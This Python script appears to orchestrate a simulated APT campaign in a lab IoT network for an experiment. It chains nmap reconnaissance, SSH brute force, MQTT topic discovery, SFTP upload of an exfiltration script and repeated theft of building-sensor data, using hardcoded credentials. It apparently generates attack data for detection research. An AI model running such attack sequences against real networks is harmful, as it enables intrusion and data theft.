from APT import *

step_seq = [(NetstatRecStep(15), 4), (Nmap192T5RecStep(5), 6), (Nmap10T4RecStep(5), 2),
            (BruteForceStep(pause=30, host="10.0.0.6", action='t'), 1),
            (NmapMQTTDiscStep("10.0.0.6"),), (NmapMQTTDiscStep("10.0.0.7"),),
            (NmapMQTTDiscStep("10.0.0.8"),), (PauseStep(60), 1),
            (NmapBannerDiscStep("10.0.0.8", pause=40),),
            (NmapSubDiscStep("10.0.0.8", pause=40), 3), (PauseStep(180), 1),
            (SftpInstStep("10.0.0.6", ["/pub_exfiltration.py", "/mqtt_utilities.py"], pause=200),),
            (SftpInstStep("10.0.0.7", ["/pub_exfiltration.py", "/mqtt_utilities.py"], pause=200),),
            (SftpInstStep("10.0.0.8", ["/pub_exfiltration.py", "/mqtt_utilities.py"], pause=200),),
            (PubExfExploit("10.0.0.6", "client1", "pass1",
                           ["Building1/Floor1/Flame_Sensor",
                            "Building1/Floor1/Gas_Sensor",
                            "Building1/Floor1/Smoke_Sensor",
                            "Building1/Floor1/Temperature_Humidity",
                            "Building1/Grage/Sound_Sensor",
                            "Building1/Outside/BMP_Sensor", "Building1/Outside/Light",
                            "Building1/Outside/Motion", "Building1/SolarPower/Voltage",
                            "Building1/Tank/Water_Level",
                            "Building1/Window/Vibration_Sensor"], duration=600, pause=300),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.6", timeout=300, pause=300, dest_file="./sftp_exf1"), 1),
            (PauseStep(300), 1), (PubExfExploit("10.0.0.7", "client1", "pass1",
                                                ["Building2/Floor1/Flame_Sensor",
                                                 "Building2/Floor1/Gas_Sensor",
                                                 "Building2/Floor1/Smoke_Sensor",
                                                 "Building2/Floor1/Temperature_Humidity",
                                                 "Building2/Grage/Sound_Sensor",
                                                 "Building2/Outside/BMP_Sensor",
                                                 "Building2/Outside/Light",
                                                 "Building2/Outside/Motion",
                                                 "Building2/SolarPower/Voltage",
                                                 "Building2/Tank/Water_Level",
                                                 "Building2/Window/Vibration_Sensor"], duration=600, pause=300),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.7", timeout=300, pause=300, dest_file="./sftp_exf2"), 1),
            (PauseStep(300), 1), (PubExfExploit("10.0.0.8", "client1", "pass1",
                                                ["Building3/Door/Touch_Sensor",
                                                 "Building3/Floor1/Flame_Sensor",
                                                 "Building3/Floor1/Gas_Sensor",
                                                 "Building3/Floor1/Smoke_Sensor",
                                                 "Building3/Floor1/Temperature_Humidity",
                                                 "Building3/Grage/Sound_Sensor",
                                                 "Building3/Outside/BMP_Sensor",
                                                 "Building3/Outside/Light",
                                                 "Building3/Outside/Motion",
                                                 "Building3/SolarPower/Voltage",
                                                 "Building3/Tank/Water_Level",
                                                 "Building3/Window/Vibration_Sensor"], duration=600, pause=300),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.8", timeout=300, pause=300, dest_file="./sftp_exf3"), 1),
            (PauseStep(300), 1), (NmapBannerDiscStep("10.0.0.6", pause=100), 1),
            (NmapBannerDiscStep("10.0.0.7", pause=100), 1), (NmapBannerDiscStep("10.0.0.8", pause=100), 1),
            (NmapMQTTDiscStep("10.0.0.9"),), (PauseStep(60), 1),
            (NmapBannerDiscStep("10.0.0.9", pause=40),),
            (NmapSubDiscStep("10.0.0.9", pause=40), 2), (PauseStep(180), 1),
            (SftpInstStep("10.0.0.9", ["/pub_exfiltration.py", "/mqtt_utilities.py"], pause=500),),
            (PubExfExploit("10.0.0.9", "client3", "pass3",
                           ["Building4/Floor1/Flame_Sensor",
                            "Building4/Floor1/Gas_Sensor",
                            "Building4/Floor1/Smoke_Sensor",
                            "Building4/Floor1/Temperature_Humidity",
                            "Building4/Grage/Sound_Sensor",
                            "Building4/Outside/BMP_Sensor",
                            "Building4/Outside/Light",
                            "Building4/Outside/Motion",
                            "Building4/SolarPower/Voltage",
                            "Building4/Tank/Water_Level",
                            "Building4/Window/Vibration_Sensor", ], duration=600, pause=300),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf4"), 1),
            (PauseStep(60), 1), (NmapBannerDiscStep("10.0.0.9", pause=60), 1),
            (PubExfExploit("10.0.0.9", "client3", "pass3",
                           ["Building4/Floor1/Flame_Sensor",
                            "Building4/Floor1/Gas_Sensor",
                            "Building4/Floor1/Smoke_Sensor",
                            "Building4/Floor1/Temperature_Humidity",
                            "Building4/Grage/Sound_Sensor",
                            "Building4/Outside/BMP_Sensor",
                            "Building4/Outside/Light",
                            "Building4/Outside/Motion",
                            "Building4/SolarPower/Voltage",
                            "Building4/Tank/Water_Level",
                            "Building4/Window/Vibration_Sensor", ], duration=600, pause=10),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf5"), 1),
            (PauseStep(60), 1), (NmapBannerDiscStep("10.0.0.9", pause=60), 1),
            (PubExfExploit("10.0.0.9", "client3", "pass3",
                           ["Building4/Floor1/Flame_Sensor",
                            "Building4/Floor1/Gas_Sensor",
                            "Building4/Floor1/Smoke_Sensor",
                            "Building4/Floor1/Temperature_Humidity",
                            "Building4/Grage/Sound_Sensor",
                            "Building4/Outside/BMP_Sensor",
                            "Building4/Outside/Light",
                            "Building4/Outside/Motion",
                            "Building4/SolarPower/Voltage",
                            "Building4/Tank/Water_Level",
                            "Building4/Window/Vibration_Sensor", ], duration=600, pause=10),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf6"), 1),
            (PauseStep(60), 1), (NmapBannerDiscStep("10.0.0.9", pause=60), 1),
            (PubExfExploit("10.0.0.9", "client3", "pass3",
                           ["Building4/Floor1/Flame_Sensor",
                            "Building4/Floor1/Gas_Sensor",
                            "Building4/Floor1/Smoke_Sensor",
                            "Building4/Floor1/Temperature_Humidity",
                            "Building4/Grage/Sound_Sensor",
                            "Building4/Outside/BMP_Sensor",
                            "Building4/Outside/Light",
                            "Building4/Outside/Motion",
                            "Building4/SolarPower/Voltage",
                            "Building4/Tank/Water_Level",
                            "Building4/Window/Vibration_Sensor", ], duration=600, pause=10),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf7"), 1),
            (PauseStep(60), 1), (NmapBannerDiscStep("10.0.0.9", pause=60), 1),
            (PubExfExploit("10.0.0.9", "client3", "pass3",
                           ["Building4/Floor1/Flame_Sensor",
                            "Building4/Floor1/Gas_Sensor",
                            "Building4/Floor1/Smoke_Sensor",
                            "Building4/Floor1/Temperature_Humidity",
                            "Building4/Grage/Sound_Sensor",
                            "Building4/Outside/BMP_Sensor",
                            "Building4/Outside/Light",
                            "Building4/Outside/Motion",
                            "Building4/SolarPower/Voltage",
                            "Building4/Tank/Water_Level",
                            "Building4/Window/Vibration_Sensor", ], duration=600, pause=10),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf8"), 1),
            (PauseStep(60), 1), (NmapBannerDiscStep("10.0.0.9", pause=60), 1),
            (PubExfExploit("10.0.0.9", "client3", "pass3",
                           ["Building4/Floor1/Flame_Sensor",
                            "Building4/Floor1/Gas_Sensor",
                            "Building4/Floor1/Smoke_Sensor",
                            "Building4/Floor1/Temperature_Humidity",
                            "Building4/Grage/Sound_Sensor",
                            "Building4/Outside/BMP_Sensor",
                            "Building4/Outside/Light",
                            "Building4/Outside/Motion",
                            "Building4/SolarPower/Voltage",
                            "Building4/Tank/Water_Level",
                            "Building4/Window/Vibration_Sensor", ], duration=600, pause=10),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf9"), 1),
            (PauseStep(60), 1), (NmapBannerDiscStep("10.0.0.9", pause=60), 1),
            (PubExfExploit("10.0.0.9", "client3", "pass3",
                           ["Building4/Floor1/Flame_Sensor",
                            "Building4/Floor1/Gas_Sensor",
                            "Building4/Floor1/Smoke_Sensor",
                            "Building4/Floor1/Temperature_Humidity",
                            "Building4/Grage/Sound_Sensor",
                            "Building4/Outside/BMP_Sensor",
                            "Building4/Outside/Light",
                            "Building4/Outside/Motion",
                            "Building4/SolarPower/Voltage",
                            "Building4/Tank/Water_Level",
                            "Building4/Window/Vibration_Sensor", ], duration=600, pause=10),),
            (PauseStep(100), 1), (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf10"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (SftpInstStep("10.0.0.10", ["/pub_exfiltration.py", "/mqtt_utilities.py"], pause=100),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(100), 1),
            (SftpExfExploit("10.0.0.9", timeout=300, pause=300, dest_file="./sftp_exf10"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (Nmap10T5RecStep(60), 2), (NmapBannerDiscStep("10.0.0.10", pause=60), 2),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=400),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1),
            (PauseStep(60),), (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=500),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 1), (PauseStep(60),),
            (Nmap10T5RecStep(60),), (NmapBannerDiscStep("10.0.0.10", pause=60),),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=800),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 3),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=800),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 3),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=800),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 3),
            (NmapSubDiscStep("10.0.0.10", pause=60),),
            (PubExfExploit("10.0.0.10", "client1", "pass1", ["topic_new"], duration=800),),
            (SftpExfExploit("10.0.0.10", timeout=300, pause=600, dest_file="./sftp_exf_new"), 3),
            ]
exp_details = []
atk = APTAttack(step_seq, "pub_exf_sftp_cam_test", exp_details, "/output/experiment_details.pkl")
atk.run()
atk.save_in()
